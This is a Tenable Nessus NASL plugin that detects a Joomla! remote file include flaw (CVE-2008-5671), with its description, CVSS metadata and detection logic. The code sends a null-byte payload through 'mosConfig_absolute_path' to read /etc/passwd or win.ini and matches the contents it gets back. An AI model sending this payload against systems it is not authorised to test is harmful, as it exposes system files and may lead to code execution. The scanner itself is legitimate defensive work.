The version of Joomla! running on the remote host is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the ‘mosConfig_absolute_path’ parameter before using it in the index.php script to include PHP code. Provided ‘RG_EMULATION’ is not defined in the configuration file (as would typically occur when upgrading from an older version) and the PHP ‘register_globals’ setting is disabled, an unauthenticated, remote attacker can exploit this issue to disclose arbitrary files or execute arbitrary PHP code on the remote host, subject to the privileges of the web server user ID.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(31095);
script_version("1.27");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2008-5671");
script_bugtraq_id(27795);
script_name(english:"Joomla! 'mosConfig_absolute_path' Parameter Remote File Include");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
remote file include vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of Joomla! running on the remote host is affected by a
remote file include vulnerability due to improper sanitization of
user-supplied input to the 'mosConfig_absolute_path' parameter before
using it in the index.php script to include PHP code. Provided
'RG_EMULATION' is not defined in the configuration file (as would
typically occur when upgrading from an older version) and the PHP
'register_globals' setting is disabled, an unauthenticated, remote
attacker can exploit this issue to disclose arbitrary files or execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user ID.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2008/Feb/207");
# https://www.joomla.org/announcements/release-news/4609-joomla-1015-released.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fd9988be");
script_set_attribute(attribute:"solution", value:
"Upgrade to Joomla! version 1.0.15 or later. Alternatively, edit the
application's configuration.php file to disable 'RG_EMULATION'.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:W/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:W/RC:X");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_cwe_id(94);
script_set_attribute(attribute:"vuln_publication_date", value:"2008/02/08");
script_set_attribute(attribute:"patch_publication_date", value:"2008/02/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/02/15");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2008-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("joomla_detect.nasl", "os_fingerprint.nasl");
script_require_keys("installed_sw/Joomla!", "www/PHP");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
# Try to retrieve a local file.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os)
files = make_list('/windows/win.ini','/winnt/win.ini');
else
files = make_list('/etc/passwd');
}
else files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini', 'LICENSE.php');
file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['/winnt/win.ini'] = "^\[[a-zA-Z\s]+\]|^; for 16-bit app support";
file_pats['/windows/win.ini'] = "^\[[a-zA-Z\s]+\]|^; for 16-bit app support";
file_pats['LICENSE.php'] = "GNU GENERAL PUBLIC LICENSE";
vuln = FALSE;
error = FALSE;
foreach file (files)
{
url = "/index.php?mosConfig_absolute_path=" + file + "%00";
w = http_send_recv3(
method : "GET",
item : dir + url,
port : port,
exit_on_fail : TRUE
);
res = w[2];
# There's a problem if...
if (egrep(pattern:file_pats[file], string:res))
{
vuln = TRUE;
contents = res;
break;
}
# we get an error because magic_quotes was enabled
else if (file + "\0/includes/version.php" >< res)
{
vuln = TRUE;
error = TRUE;
contents = strstr(res, file);
break;
}
# we get an error claiming the file doesn't exist
else if (
"main(" +file+ "): failed to open stream: No such file" >< res ||
"include("+file+") [function.include]: failed to open stream: No such file" >< res
)
{
vuln = TRUE;
error = TRUE;
contents = strstr(res, file);
break;
}
# we get an error about open_basedir restriction.
else if ("open_basedir restriction in effect. File(" + file >< res)
{
vuln = TRUE;
error = TRUE;
contents = strstr(res, "open_basedir");
break;
}
}
if (vuln)
{
if (error)
{
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(install_url + url),
output : contents,
rep_extra :
'Note that Nessus was not able to directly exploit this issue;'+
'\nhowever, based on the error below, the install does appear to be'+
'\naffected.'
);
exit(0);
}
if ("<br" >< contents) contents = contents - strstr(contents, "<br");
security_report_v4(
port : port,
severity : SECURITY_HOLE,
file : file,
request : make_list(install_url + url),
output : contents,
attach_type : 'text/plain'
);
exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
Vendor | Product | Version | CPE |
---|---|---|---|
joomla | joomla%5c%21 | cpe:/a:joomla:joomla%5c%21 |